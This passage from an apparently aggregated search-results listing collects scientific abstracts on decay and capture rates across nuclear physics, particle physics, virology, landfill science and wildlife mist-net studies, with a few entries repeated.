resulting from (γ,n) and (n,γ) reactions when 16N decay radiation interact with these materials need to be well known for effective shielding design. In this study the MCNP code was used to calculate the photoneutron and capture gamma-ray spectra in the two materials when irradiated by 16N decay radiation. It was observed that some of the photoneutrons generated in the two materials lie in the low-energy range which is considered optimum for (n,γ) reactions. Lead is more transparent to the photoneutrons when compared to tungsten. The calculations also revealed that the bremsstrahlung generated by the beta spectrum was not sufficient to trigger any additional photoneutrons. Both energetic and less energetic capture gamma-rays are observed when photoneutrons interact with nuclei of the two materials. Depending on the strength of the 16N source term, the secondary radiation could affect the effectiveness of the shield and need to be considered during design. 8. Renormalization-scale uncertainty in the decay rate of false vacuum Endo, Motoi; Moroi, Takeo; Nojiri, Mihoko M.; Shoji, Yutaro 2016-01-01 We study radiative corrections to the decay rate of false vacua, paying particular attention to the renormalization-scale dependence of the decay rate. The decay rate exponentially depends on the bounce action. The bounce action itself is renormalization-scale dependent. To make the decay rate scale-independent, radiative corrections, which are due to the field fluctuations around the bounce, have to be included. We show quantitatively that the inclusion of the fluctuations suppresses the scale dependence, and hence is important for the precise calculation of the decay rate. We also apply our analysis to a supersymmetric model and show that the radiative corrections are important for the Higgs-stau system with charge breaking minima. 9. The 2νβ-β- decay rates within Pyatov's restoration method Ünlü, Serdar; Çakmak, Neçla; Selam, Cevad 2017-01-01 We try to give a detailed analysis of the 2 νβ-β- decay rates to the final ground states for decay emitters: 70Zn, 80Se, 86Kr, 94Zr, 104Ru, 110Pd, 114Cd and 124Sn. The nucleon-nucleon residual interaction potential is defined according to Pyatov's restoration method. The nuclear matrix element for 2 νβ-β- decay is obtained by including the virtual contributions coming from the isobar analogue excitations within the framework of proton-neutron quasi-particle random phase approximation (pnQRPA). The calculated decay rates are compared with mean field, schematic model and other calculations. 10. Search for massive neutrinos in the recoil spectrum of {sup 37}Cl following electron capture decay of {sup 37}Ar SciTech Connect Hindi, M.M.; Bardayan, D.W.; Kozub, R.L.; Robinson, S.J. 1993-10-01 We are developing an experiment to measure the spectrum of recoil velocities of {sup 37}CI ions following the electron capture (EC) decay of {sup 37}Ar. One of the initial aims of this experiment is to search for massive neutrinos (m{sub v} {approximately} 200-250 keV) which might be emitted in the decay, with a mixing probability of < 0.3%. A 300 mCi {sup 37}Ar source was produced via the {sup 36}Ar(n,{gamma}) reaction at the BNL reactor. The gas was bled into an ultra high vacuum system at MSU and 1-2 monolayers were adsorbed on a Au-coated Si(111) surface cooled to 20 K. The Auger electrons associated with the EC decay of {sup 37}Ar were detected in a Channeltron detector. The recoiling {sup 37}Cl ions were detected in a microchannel-plate detector. We are currently preparing a fresh {sup 37}Ar sample, and plan to measure the time-of-flight spectrum of the recoils by detecting them in delayed coincidence with the Auger electrons. 11. Estimation of waste component-specific landfill decay rates using laboratory-scale decomposition data. PubMed De la Cruz, Florentino B; Barlaz, Morton A 2010-06-15 The current methane generation model used by the U.S. EPA (Landfill Gas Emissions Model) treats municipal solid waste (MSW) as a homogeneous waste with one decay rate. However, component-specific decay rates are required to evaluate the effects of changes in waste composition on methane generation. Laboratory-scale rate constants, k(lab), for the major biodegradable MSW components were used to derive field-scale decay rates (k(field)) for each waste component using the assumption that the average of the field-scale decay rates for each waste component, weighted by its composition, is equal to the bulk MSW decay rate. For an assumed bulk MSW decay rate of 0.04 yr(-1), k(field) was estimated to be 0.298, 0.171, 0.015, 0.144, 0.033, 0.02, 0.122, and 0.029 yr(-1), for grass, leaves, branches, food waste, newsprint, corrugated containers, coated paper, and office paper, respectively. The effect of landfill waste diversion programs on methane production was explored to illustrate the use of component-specific decay rates. One hundred percent diversion of yard waste and food waste reduced the year 20 methane production rate by 45%. When a landfill gas collection schedule was introduced, collectable methane was most influenced by food waste diversion at years 10 and 20 and paper diversion at year 40. 12. Long-term measurements of 36Cl to investigate potential solar influence on the decay rate Kossert, Karsten; Nähle, Ole J. 2014-03-01 Recently, Jenkins et al. [6] reported on fluctuations in the detected decay events of 36Cl which were measured with a Geiger-Müller counter. Experimental data of 32Si measured by means of an end-window gas-flow proportional counter at the Brookhaven National Laboratory show similar periodicity, albeit a different amplitude. Jenkins et al. interpret the fluctuations as evidence of solar influence on the decay rates of beta-decaying radionuclides. 13. Mechanisms and Rates of Decay of Marine Viruses in Seawater † PubMed Central Suttle, Curtis A.; Chen, Feng 1992-01-01 Loss rates and loss processes for viruses in coastal seawater from the Gulf of Mexico were estimated with three different marine bacteriophages. Decay rates in the absence of sunlight ranged from 0.009 to 0.028 h-1, with different viruses decaying at different rates. In part, decay was attributed to adsorption by heat-labile particles, since viruses did not decay or decayed very slowly in seawater filtered through a 0.2-μm-pore-size filter (0.2-μm-filtered seawater) and in autoclaved or ultracentrifuged seawater but continued to decay in cyanide-treated seawater. Cyanide did cause decay rates to decrease, however, indicating that biological processes were also involved. The observations that decay rates were often greatly reduced in 0.8- or 1.0-μm-filtered seawater, whereas bacterial numbers were not, suggested that most bacteria were not responsible for the decay. Decay rates were also reduced in 3-μm-filtered or cycloheximide-treated seawater but not in 8-μm-filtered seawater, implying that flagellates consumed viruses. Viruses added to flagellate cultures decayed at 0.15 h-1, corresponding to 3.3 viruses ingested flagellate-1 h-1. Infectivity was very sensitive to solar radiation and, in full sunlight, decay rates were 0.4 to 0.8 h-1. Even when UV-B radiation was blocked, rates were as high as 0.17 h-1. Calculations suggest that in clear oceanic waters exposed to full sunlight, most of the virus decay, averaged over a depth of 200 m, would be attributable to solar radiation. When decay rates were averaged over 24 h for a 10-m coastal water column, loss rates of infectivity attributable to sunlight were similar to those resulting from all other processes combined. Consequently, there should be a strong diel signal in the concentration of infectious viruses. In addition, since sunlight destroys infectivity more quickly than virus particles, a large proportion of the viruses in seawater is probably not infective. Images PMID:16348812 14. The use of decay rates to analyse the performance of railway track in rolling noise generation Jones, C. J. C.; Thompson, D. J.; Diehl, R. J. 2006-06-01 Through the development and testing of theoretical models for rolling noise in the past, it has been well demonstrated that the rate of decay of vibration along the rail is closely linked to the noise performance of the track, since it controls the effective radiating length of the rail. The decay rates of vibration along the rail have long been used by researchers as an intermediate, measurable parameter by which to test and improve the accuracy of prediction models. Recently, it has been suggested that the decay rates should be used as a criterion for the selection of track for noise measurements that are part of the acceptance testing of interoperable trains in Europe. In this context, a more detailed understanding of the factors that affect the measurement of decay rates and a consistent approach to the data processing have become important topics. Here, a method is suggested for the calculation of decay rates from frequency response measurements. Different effects are shown in the measured decay rates of a ballasted track with mono-bloc sleepers, a slab track and a ballasted track with bi-bloc sleepers. In the last case, a model for a periodically supported track is used to study the effects observed. It is shown that a peak in the decay rate just above the pinned-pinned frequency may be overestimated because of the measurement procedure that has been used. 15. The microscopic approach to the rates of radioactive decay by emission of heavy clusters Ivaşcu, M.; Silişteanu, I. 1988-08-01 We have applied a simple microscopic decay theory to the analysis of the rare decay modes. The absolute decay rates are estimated by using the shell model and resonance formation factors and optical model penetrabilities. The resonance formation factors are deduced from the strong interaction form of the theory where the wave function in the internal region is represented in terms of compound nucleus decay. In order to account fully for the data, the implication of internal degrees of freedom was found to be necessary, but no adjustment of Gamow factor was needed. The results have been discussed in the light of the previously reported results and data. 16. Factors influencing the variation in capture rates of shrews in southern California, USA USGS Publications Warehouse Laakkonen, Juha; Fisher, Robert N.; Case, Ted J. 2003-01-01 We examined the temporal variation in capture rates of shrewsNotiosorex crawfordi (Coues, 1877) and Sorex ornatus (Merriam, 1895) in 20 sites representing fragmented and continuous habitats in southern California, USA. InN. crawfordi, the temporal variation was significantly correlated with the mean capture rates. Of the 6 landscape variables analyzed (size of the landscape, size of the sample area, altitude, edge, longitude and latitude), sample area was positively correlated with variation in capture rates ofN. crawfordi. InS. ornatus, longitude was negatively correlated with variation in capture rates. Analysis of the effect of precipitation on the short- and long-term capture rates at 2 of the sites showed no correlation between rainfall and capture rates of shrews even though peak number of shrews at both sites were reached during the year of highest amount of rainfall. A key problem confounding capture rates of shrews in southern California is the low overall abundance of both shrew species in all habitats and seasons. 17. Resonance capture at arbitrary inclination - II. Effect of the radial drift rate Namouni, F.; Morais, M. H. M. 2017-05-01 18. Stability and decay rates of nonisotropic attractive Bose-Einstein condensates SciTech Connect Huepe, C.; Tuckerman, L. S.; Metens, S.; Brachet, M. E. 2003-08-01 Nonisotropic attractive Bose-Einstein condensates are investigated numerically with Newton and inverse Arnoldi methods. The stationary solutions of the Gross-Pitaevskii equation and their linear stability are computed. Bifurcation diagrams are calculated and used to find the condensate decay rates corresponding to macroscopic quantum tunneling, two-three-body inelastic collisions, and thermally induced collapse. Isotropic and nonisotropic condensates are compared. The effect of anisotropy on the bifurcation diagram and the decay rates is discussed. Spontaneous isotropization of the condensates is found to occur. The influence of isotropization on the decay rates is characterized near the critical point. 19. Energy decay rate of transmission problem between thermoelasticity of type I and type II Wang, Jing; Han, Zhong-Jie; Xu, Gen-Qi 2017-06-01 In this paper, the energy decay rate of a 1-d mixed type I and type II thermoelastic system is considered. The system consists of two kinds of thermoelastic components. One is the classical thermoelasticity (so-called type I), another one is nonclassical thermoelasticity without dissipation (named type II). These two components are coupled at the interface satisfying certain transmission condition. We prove that the system is lack of uniform exponential decay rate and further obtain the sharp polynomial decay rate by resolvent estimates together with the diagonalization argument in linear algebra. Moreover, we present some numerical simulations to support these theoretical results. 20. Biomass decay rates and tissue nutrient loss in bloom and non-bloom-forming macroalgal species Conover, Jessie; Green, Lindsay A.; Thornber, Carol S. 2016-09-01 Macroalgal blooms occur in shallow, low-wave energy environments and are generally dominated by fast-growing ephemeral macroalgae. When macroalgal mats undergo senescence and decompose they can cause oxygen depletion and release nutrients into the surrounding water. There are relatively few studies that examine macroalgal decomposition rates in areas impacted by macroalgal blooms. Understanding the rate of macroalgal bloom decomposition is essential to understanding the impacts of macroalgal blooms following senescence. Here, we examined the biomass, organic content, nitrogen decay rates and δ15N values for five macroalgal species (the bloom-forming Agardhiella subulata, Gracilaria vermiculophylla, Ulva compressa, and Ulva rigida and the non-bloom-forming Fucus vesiculosus) in Narragansett Bay, Rhode Island, U.S.A. using a litterbag design. Bloom-forming macroalgae had similar biomass decay rates (0.34-0.51 k d-1) and decayed significantly faster than non-bloom-forming macroalgae (0.09 k d-1). Biomass decay rates also varied temporally, with a significant positive correlation between biomass decay rate and water temperature for U. rigida. Tissue organic content decreased over time in all species, although A. subulata and G. vermiculophylla displayed significantly higher rates of organic content decay than U. compressa, U. rigida, and F. vesiculosus. Agardhiella subulata had a significantly higher rate of tissue nitrogen decay (0.35 k d-1) than all other species. By contrast, only the δ15N of F. vesiculosus changed significantly over the decay period. Overall, our results indicate that bloom-forming macroalgal species decay more rapidly than non-bloom-forming species. 1. The anharmonic phonon decay rate in group-III nitrides Srivastava, G. P. 2009-04-01 Measured lifetimes of hot phonons in group-III nitrides have been explained theoretically by considering three-phonon anharmonic interaction processes. The basic ingredients of the theory include full phonon dispersion relations obtained from the application of an adiabatic bond charge model and crystal anharmonic potential within the isotropic elastic continuum model. The role of various decay routes, such as Klemens, Ridley, Vallée-Bogani and Barman-Srivastava channels, in determining the lifetimes of the Raman active zone-centre longitudinal optical (LO) modes in BN (zincblende structure) and A1(LO) modes in AlN, GaN and InN (wurtzite structure) has been quantified. 2. Temporal patterns in capture rate and sex ratio of forest bats in Arkansas Treesearch Roger W. Perry; S. Andrew Carter; Ronald E. Thill 2010-01-01 We quantified changes in capture rates and sex ratios from May to Sept. for eight species of bats, derived from 8 y of extensive mist netting in forests of the Ouachita Mountains, Arkansas. Our primary goal was to determine patterns of relative abundance for each species of bat captured over forest streams and to determine if these patterns were similar to patterns of... 3. Electron capture decay of 58-min U-229(92) and levels in Pa-229(91) SciTech Connect Ahmad, I.; Chasman, R. R.; Greene, J. P.; Kondev, F. G.; Zhu, S. 2015-08-17 Electron capture decay of U-229 is investigated by measuring the gamma-ray and conversion electron spectra of mass-separated and unseparated U-229 sources with high-resolution germanium and silicon detectors, respectively. Gamma-gamma coincidence measurements are also performed using germanium detectors. These studies provide level energies and level ordering in Pa-229. Single-particle assignments are given to these levels which are in agreement with the systematics in this region and also with theory. In a previous study, we report the observation of a 5/2(+/-) parity doublet in the Pa-229 ground state, which is a signature of octupole deformation. The present analysis of the data still shows a splitting of 60 +/- 50 eV, but with this large uncertainty the existence of the doublet is not certain. 4. Coping with mist-net capture-rate bias: Canopy height and several extrinsic factors USGS Publications Warehouse Mallory, Elizabeth P.; Brokaw, Nicholas V. L.; Hess, Steven C. 2004-01-01 Many factors other than a species' actual abundance can affect mist-net capture rates. We used ANCOVA models to quantify some potential biases and control their effects, producing adjusted estimates of capture rates that are more directly comparable among mist-net stations. Data came from 46 two-day mist-net sessions from September 1990 to May 1992 at six subtropical forest stations in the Rio Bravo Conservation and Management Area, northwest Belize. Factors evaluated included canopy height at net sites, long-term net shyness (days elapsed between first and last netting day of the entire study period), season (wet vs. dry), total rainfall during a netting session, and temperature. Number of individuals and species captured/10 net-h declined at each net with increasing canopy height above the net. Capture rates differed significantly among some of the stations. Elapsed days and rainfall caused significant bias in capture rates, which were statistically controlled within the ANCOVA, whereas season and temperature did not. Capture rates varied among sessions, but there was a slight and significant decline over the entire study period for all stations combined. Rainfall significantly depressed capture rates somewhat on a daily basis, but capture rates did not differ between wet and dry seasons. When we replaced the station variable in the ANCOVA with mean canopy height, the model was still highly significant, but did not explain as much of the variation in capture rates. Statistical analysis provides an objective means of interpreting data and estimating reliability, but only if statistical assumptions of the analyses are met. We discuss the need for including randomization in the experimental design, standardizing netting protocol, and quantifying sources of bias in the field, before ANCOVA or other parametric statistical techniques can be used to partition effects of biases. 5. Calculations on decay rates of various proton emissions Qian, Yibin; Ren, Zhongzhou 2016-03-01 Proton radioactivity of neutron-deficient nuclei around the dripline has been systematically studied within the deformed density-dependent model. The crucial proton-nucleus potential is constructed via the single-folding integral of the density distribution of daughter nuclei and the effective M3Y nucleon-nucleon interaction or the proton-proton Coulomb interaction. After the decay width is obtained by the modified two-potential approach, the final decay half-lives can be achieved by involving the spectroscopic factors from the relativistic mean-field (RMF) theory combined with the BCS method. Moreover, a simple formula along with only one adjusted parameter is tentatively proposed to evaluate the half-lives of proton emitters, where the introduction of nuclear deformation is somewhat discussed as well. It is found that the calculated results are in satisfactory agreement with the experimental values and consistent with other theoretical studies, indicating that the present approach can be applied to the case of proton emission. Predictions on half-lives are made for possible proton emitters, which may be useful for future experiments. 6. Neutron-capture rates for explosive nucleosynthesis: the case of 68Ni(n, γ)69Ni Spyrou, A.; Larsen, A. C.; Liddick, S. N.; Naqvi, F.; Crider, B. P.; Dombos, A. C.; Guttormsen, M.; Bleuel, D. L.; Couture, A.; Crespo Campo, L.; Lewis, R.; Mosby, S.; Mumpower, M. R.; Perdikakis, G.; Prokop, C. J.; Quinn, S. J.; Renstrøm, T.; Siem, S.; Surman, R. 2017-04-01 Neutron-capture reactions play an important role in heavy element nucleosynthesis, since they are the driving force for the two processes that create the vast majority of the heavy elements. When a neutron capture occurs on a short-lived nucleus, it is extremely challenging to study the reaction directly and therefore the use of indirect techniques is essential. The present work reports on such an indirect measurement that provides strong constraints on the 68Ni(n, γ)69Ni reaction rate. This is done by populating the compound nucleus 69Ni via the β decay of 69Co and measuring the γ-ray deexcitation of excited states in 69Ni. The β-Oslo method was used to extract the γ-ray strength function and the nuclear level density. In addition the half-life of 69Co was extracted and found to be in agreement with previous literature values. Before the present results, the 68Ni(n, γ)69Ni reaction was unconstrained and the purely theoretical reaction rate was highly uncertain. The new uncertainty on the reaction rate based on the present experiment (variation between upper and lower limit) is approximately a factor of 3. The commonly used reaction libraries JINA-REACLIB and BRUSLIB are in relatively good agreement with the experimental rate. The impact of the new rate on weak r-process calculations is discussed. 7. Seasonal determinations of algal virus decay rates reveal overwintering in a temperate freshwater pond. PubMed Long, Andrew M; Short, Steven M 2016-07-01 To address questions about algal virus persistence (i.e., continued existence) in the environment, rates of decay of infectivity for two viruses that infect Chlorella-like algae, ATCV-1 and CVM-1, and a virus that infects the prymnesiophyte Chrysochromulina parva, CpV-BQ1, were estimated from in situ incubations in a temperate, seasonally frozen pond. A series of experiments were conducted to estimate rates of decay of infectivity in all four seasons with incubations lasting 21 days in spring, summer and autumn, and 126 days in winter. Decay rates observed across this study were relatively low compared with previous estimates obtained for other algal viruses, and ranged from 0.012 to 11% h(-1). Overall, the virus CpV-BQ1 decayed most rapidly whereas ATCV-1 decayed most slowly, but for all viruses the highest decay rates were observed during the summer and the lowest were observed during the winter. Furthermore, the winter incubations revealed the ability of each virus to overwinter under ice as ATCV-1, CVM-1 and CpV-BQ1 retained up to 48%, 19% and 9% of their infectivity after 126 days, respectively. The observed resilience of algal viruses in a seasonally frozen freshwater pond provides a mechanism that can support the maintenance of viral seed banks in nature. However, the high rates of decay observed in the summer demonstrate that virus survival and therefore environmental persistence can be subject to seasonal bottlenecks. 8. Seasonal determinations of algal virus decay rates reveal overwintering in a temperate freshwater pond PubMed Central Long, Andrew M; Short, Steven M 2016-01-01 To address questions about algal virus persistence (i.e., continued existence) in the environment, rates of decay of infectivity for two viruses that infect Chlorella-like algae, ATCV-1 and CVM-1, and a virus that infects the prymnesiophyte Chrysochromulina parva, CpV-BQ1, were estimated from in situ incubations in a temperate, seasonally frozen pond. A series of experiments were conducted to estimate rates of decay of infectivity in all four seasons with incubations lasting 21 days in spring, summer and autumn, and 126 days in winter. Decay rates observed across this study were relatively low compared with previous estimates obtained for other algal viruses, and ranged from 0.012 to 11% h−1. Overall, the virus CpV-BQ1 decayed most rapidly whereas ATCV-1 decayed most slowly, but for all viruses the highest decay rates were observed during the summer and the lowest were observed during the winter. Furthermore, the winter incubations revealed the ability of each virus to overwinter under ice as ATCV-1, CVM-1 and CpV-BQ1 retained up to 48%, 19% and 9% of their infectivity after 126 days, respectively. The observed resilience of algal viruses in a seasonally frozen freshwater pond provides a mechanism that can support the maintenance of viral seed banks in nature. However, the high rates of decay observed in the summer demonstrate that virus survival and therefore environmental persistence can be subject to seasonal bottlenecks. PMID:26943625 9. Continuum-state and bound-state β--decay rates of the neutron Faber, M.; Ivanov, A. N.; Ivanova, V. A.; Marton, J.; Pitschmann, M.; Serebrov, A. P.; Troitskaya, N. I.; Wellenzohn, M. 2009-09-01 For the β--decay of the neutron we analyze the continuum-state and bound-state decay modes. We calculate the decay rates, the electron energy spectrum for the continuum-state decay mode, and angular distributions of the decay probabilities for the continuum-state and bound-state decay modes. The theoretical results are obtained for the new value for the axial coupling constant gA=1.2750(9), obtained recently by H. Abele [Prog. Part. Nucl. Phys. 60, 1 (2008)] from the fit of the experimental data on the coefficient of the correlation of the neutron spin and the electron momentum of the electron energy spectrum of the continuum-state decay mode. We take into account the contribution of radiative corrections and the scalar and tensor weak couplings. The calculated angular distributions of the probabilities of the bound-state decay modes of the polarized neutron can be used for the experimental measurements of the bound-state β--decays into the hyperfine states with total angular momentum F=1 and scalar and tensor weak coupling constants. 10. Dose point kernel for boron-11 decay and the cellular S values in boron neutron capture therapy. PubMed Ma, Yunzhi; Geng, JinPeng; Gao, Song; Bao, Shanglian 2006-12-01 The study of the radiobiology of boron neutron capture therapy is based on the cellular level dosimetry of boron-10's thermal neutron capture reaction 10B(n,alpha)7Li, in which one 1.47 MeV helium-4 ion and one 0.84 MeV lithium-7 ion are spawned. Because of the chemical preference of boron-10 carrier molecules, the dose is heterogeneously distributed in cells. In the present work, the (scaled) dose point kernel of boron-11 decay, called 11B-DPK, was calculated by GEANT4 Monte Carlo simulation code. The DPK curve drops suddenly at the radius of 4.26 microm, the continuous slowing down approximation (CSDA) range of a lithium-7 ion. Then, after a slight ascending, the curve decreases to near zero when the radius goes beyond 8.20 microm, which is the CSDA range of a 1.47 MeV helium-4 ion. With the DPK data, S values for nuclei and cells with the boron-10 on the cell surface are calculated for different combinations of cell and nucleus sizes. The S value for a cell radius of 10 microm and a nucleus radius of 5 microm is slightly larger than the value published by Tung et al. [Appl. Radiat. Isot. 61, 739-743 (2004)]. This result is potentially more accurate than the published value since it includes the contribution of a lithium-7 ion as well as the alpha particle. 11. Examination of the calorimetric spectrum to determine the neutrino mass in low-energy electron capture decay Robertson, R. G. H. 2015-03-01 Background: The standard kinematic method for determining neutrino mass from the β decay of tritium or other isotope is to measure the shape of the electron spectrum near the endpoint. A similar distortion of the "visible energy" remaining after electron capture is caused by neutrino mass. There has been a resurgence of interest in using this method with 163Ho, driven by technological advances in microcalorimetry. Recent theoretical analyses offer reassurance that there are no significant theoretical uncertainties. Purpose: The theoretical analyses consider only single vacancy states in the daughter 163Dy atom. It is necessary to consider configurations with more than one vacancy that can be populated owing to the change in nuclear charge. Method: The shakeup and shake-off theory of Carlson and Nestor is used as a basis for estimating the population of double-vacancy states. Results: A spectrum of satellites associated with each primary vacancy created by electron capture is presented. Conclusions: The theory of the calorimetric spectrum is more complicated than has been described heretofore. There are numerous shakeup and shake-off satellites present across the spectrum, and some may be very near the endpoint. The spectrum shape is presently not understood well enough to permit a sensitive determination of the neutrino mass in this way. 12. Beta decay rates of neutron-rich nuclei SciTech Connect Marketin, Tomislav; Huther, Lutz; Martínez-Pinedo, Gabriel 2015-10-15 Heavy element nucleosynthesis models involve various properties of thousands of nuclei in order to simulate the intricate details of the process. By necessity, as most of these nuclei cannot be studied in a controlled environment, these models must rely on the nuclear structure models for input. Of all the properties, the beta-decay half-lives are one of the most important ones due to their direct impact on the resulting abundance distributions. Currently, a single large-scale calculation is available based on a QRPA calculation with a schematic interaction on top of the Finite Range Droplet Model. In this study we present the results of a large-scale calculation based on the relativistic nuclear energy density functional, where both the allowed and the first-forbidden transitions are studied in more than 5000 neutron-rich nuclei. 13. Determining neutron capture cross sections with the Surrogate Reaction Technique: Measuring decay probabilities with STARS SciTech Connect Church, J A; Ahle, L; Bernstein, L A; Cooper, J; Dietrich, F S; Escher, J; Forssen, C; Ai, H; Amro, H; Babilon, M; Beausang, C; Caggiano, J; Heinz, A; Hughes, R; McCutchan, E; Meyer, D; Plettner, C; Ressler, J; Zamfir, V 2004-07-14 Neutron-induced reaction cross sections are sometimes difficult to measure due to target or beam limitations. For two-step reactions proceeding through an equilibrated intermediate state, an alternate ''surrogate reaction'' technique can be applicable, and is currently undergoing investigation at LLNL. Measured decay probabilities for the intermediate nucleus formed in a light-ion reaction can be combined with optical-model calculations for the formation of the same intermediate nucleus via the neutron-induced reaction. The result is an estimation for overall (n,{gamma}/n/2n) cross sections. As a benchmark, the reaction {sup 92}Zr({alpha},{alpha}'), surrogate, for n+{sup 91}Zr, was studied at the A.W. Wright Nuclear Structure Laboratory at Yale. Particles were detected in the silicon telescope STARS (Silicon Telescope Array for Reaction Studies) and {gamma}-ray energies measured with germanium clover detectors from the YRAST (Yale Rochester Array for SpecTroscopy) ball. The experiment and preliminary observations will be discussed. 14. Neutron capture cross-section studies of Tellurium isotopes for neutrinoless double beta decay applications Bhike, Megha; Tornow, Werner 2014-09-01 The CUORE detector at Gran Sasso, aimed at searching for neutrinoless double-beta decay of 130Te, employs an array of TeO2 bolometer modules. To understand and identify the contribution of muon and (α,n) induced neutrons to the CUORE background, fast neutron cature cross-section data of the tellurium isotopes 126Te, 128Te and 130Te have been measured with the activation method at eight different energies in the neutron energy range 0.5-7.5 MeV. Plastic pill boxes of diameter 1.6 cm and width 1 cm containing Te were irradiated with mono-energetic neutrons produced via the 3H(p,n)3He and 2H(d,n)3He reactions. The cross-sections were determined relative to the 197Au(n, γ)198Au and 115In(n,n')115m In standard cross sections. The activities of the products were measured using 60% lead-shielded HPGe detectors at TUNL's low background counting facility. The present results are compared with the evaluated data from TENDL-2012, ENDF/B-VII.1, JEFF-3.2 and JENDL-4.0, as well as with literature data. 15. Determining neutron capture cross sections with the Surrogate Reaction Technique: Measuring decay probabilities with STARS Church, J. A.; Ahle, L.; Bernstein, L. A.; Cooper, J.; Dietrich, F. S.; Escher, J.; Forssen, C.; Ai, H.; Amro, H.; Babilon, M.; et al. 2005-07-01 Neutron-induced reaction cross sections are sometimes difficult to measure due to target or beam limitations. For two-step reactions proceeding through an equilibrated intermediate state, an alternate "surrogate reaction" technique [J.D. Cramer and H.C. Britt, Nucl. Sci. Eng. 41, 177 (1970), H.C. Britt and J.B. Wilhelmy, Nucl. Sci. Eng. 72, 222 (1979), W.Younes and H.C. Britt, Phys. Rev. C 67, 024610 (2003)] can be applicable, and is currently undergoing investigation at LLNL. Measured decay probabilities for the intermediate nucleus formed in a light-ion reaction can be combined with optical-model calculations for the formation of the same intermediate nucleus via the neutron-induced reaction. The result is an estimation for overall (n,γ/n/2n) cross sections. As a bench-mark, the reaction 92Zr(α, α'), surrogate for n+91Zr, was studied at the A.W. Wright Nuclear Structure Laboratory at Yale. Particles were detected in the silicon telescope STARS (Silicon Telescope Array for Reaction Studies) and γ-ray energies measured with germanium clover detectors from the YRAST (Yale Rochester Array for SpecTroscopy) ball. The experiment and preliminary observations will be discussed. 16. Constraining spacetime variations of nuclear decay rates from light curves of type Ia supernovae Karpikov, Ivan; Piskunov, Maxim; Sokolov, Anton; Troitsky, Sergey 2015-06-01 The luminosity of fading type Ia supernovae is governed by radioactive decays of Ni 56 and Co 56 . The decay rates are proportional to the Fermi coupling constant GF and, therefore, are determined by the vacuum expectation value v of the Brout-Englert-Higgs field. We use publicly available sets of light curves of type Ia supernova at various redshifts to constrain possible spacetime variations of the Ni 56 decay rate. The resulting constraint is not very tight; however, it is the only direct bound on the variation of the decay rate for redshifts up to z ˜1 . We discuss potential applications of the result to searches for nonconstancy of GF and v . 17. Capture-recapture estimation of prebreeding survival rate for birds exhibiting delayed maturation USGS Publications Warehouse Nichols, J.D.; Spendelow, J.A.; Hines, J.E. 1990-01-01 Many species of seabirds exhibit delayed maturity and do not return to the natal colony to breed for several years after fledging. Capture-recapture studies are frequently conducted at such breeding colonies and often include marking of young birds. However, because of the absence of these birds from the natal colony during the first few years after banding, the data do not fit neatly into existing capture-recapture models. Here we present a method for estimating prebreeding survival rate from capture-recapture studies on species exhibiting such patterns of delayed maturation. We illustrate the method using data from a capture-recapture study of Roseate Terns (Sterna dougallii ) on Falkner Island, Connecticut. The method appears to work well and emphasizes the potential to tailor capture-recapture models to specific field situations. 18. Predator-prey encounter and capture rates for plankton in turbulent environments Pécseli, H. L.; Trulsen, J.; Fiksen, Ø. 2012-08-01 Turbulence plays an important role for predator-prey interactions in aquatic environments. In one sense turbulence benefits the predator by increasing its encounter rate with prey, but on the other hand it can benefit the prey by making them more difficult to catch. In the present study of this problem, a turbulent flow field is obtained by direct numerical solution of the Navier-Stokes equation. The analysis includes the effects of the turbulence on the encounter rate between passively moving predators and prey, and at the same time also models the capture probability depending on the relative turbulent motions of predator and prey. Analytical results for scaling laws for planktonic encounter and capture rates in turbulent environments are obtained in terms of the basic parameters for the problem, and the results are compared with related findings reported in the literature. For large values of the specific energy dissipation rates ɛ the turbulence reduces the capture probability significantly, in part also because the effective capture range reduces for increasing turbulence intensity. The results presented here predict the parameters for an optimum turbulence level for the predator capture rate. For enhanced turbulence levels sudden bursts in the space-time varying velocity field contribute to a noise level that can reduce the probability for capturing prey. We consider cases where the capture range of an organism is comparable to or smaller than the effective Kolmogorov length scale, as well as the opposite limit of larger capture ranges in the inertial range of the turbulence. The reference model assumes spherical interception volumes, but it is demonstrated that the results remain basically valid also for the case where these volumes are hemispherical or conical: the consequences of having a shape of the interception surface deviating from a sphere can be accounted for by an empirical scaling factor, which depends solely on the opening angle of the cone. 19. WEST NILE VIRUS ANTIBODY DECAY RATE IN FREE-RANGING BIRDS. PubMed McKee, Eileen M; Walker, Edward D; Anderson, Tavis K; Kitron, Uriel D; Brawn, Jeffrey D; Krebs, Bethany L; Newman, Christina; Ruiz, Marilyn O; Levine, Rebecca S; Carrington, Mary E; McLean, Robert G; Goldberg, Tony L; Hamer, Gabriel L 2015-07-01 Antibody duration, following a humoral immune response to West Nile virus (WNV) infection, is poorly understood in free-ranging avian hosts. Quantifying antibody decay rate is important for interpreting serologic results and for understanding the potential for birds to serorevert and become susceptible again. We sampled free-ranging birds in Chicago, Illinois, US, from 2005 to 2011 and Atlanta, Georgia, US, from 2010 to 2012 to examine the dynamics of antibody decay following natural WNV infection. Using serial dilutions in a blocking enzyme-linked immunosorbent assay, we quantified WNV antibody titer in repeated blood samples from individual birds over time. We quantified a rate of antibody decay for 23 Northern Cardinals (Cardinalis cardinalis) of 0.198 natural log units per month and 24 individuals of other bird species of 0.178 natural log units per month. Our results suggest that juveniles had a higher rate of antibody decay than adults, which is consistent with nonlinear antibody decay at different times postexposure. Overall, most birds had undetectable titers 2 yr postexposure. Nonuniform WNV antibody decay rates in free-ranging birds underscore the need for cautious interpretation of avian serology results in the context of arbovirus surveillance and epidemiology. 20. Probing CP violation with time integrated decay rates into non-CP eigenstates Silva, João P. 1998-07-01 Many of the experiments proposed to look for interference CP violation in neutral B mesons concentrate on tagged decay into CP eigenstates. Aleksan, Dunietz, Kayser and Le Diberder have shown that one can also look for interference CP violation using tagged decays into non-CP eigenstates. In all these methods, one must trace the time dependence of the decays. In this article we discuss a new method to search for interference CP violation by using only time integrated rates into non-CP eigenstates. The method hinges on the comparison between the decays of Υ(4S) into ff, f¯f¯, and ff¯, and also uses the rates for l+f and l-f. This method does not depend on how the Υ(4S) is produced; provided enough statistics, one can use both symmetric and asymmetric colliders. 1. Mesh size and bird capture rates in Mato Grosso do Sul State, Brazil. PubMed Piratelli, A 2003-02-01 Mist-nets alternating 36-mm and 61-mm mesh in woods and low vegetation of "cerrado" (Brazilian savanna) tested bird-capture efficiency relative to bird length and mass. Of 1,296 birds captured and 102 species, 785 (93 species) were with 36-m mesh and 511 (69 species) with 61-mm mesh. The 61-mm mesh improved capture rates only for some larger species; so, in general, 36-mm mesh mist-nets are more appropriate for field work in "cerrado" areas. 2. A measurement of the gluon splitting rate into /cc¯ pairs in hadronic Z 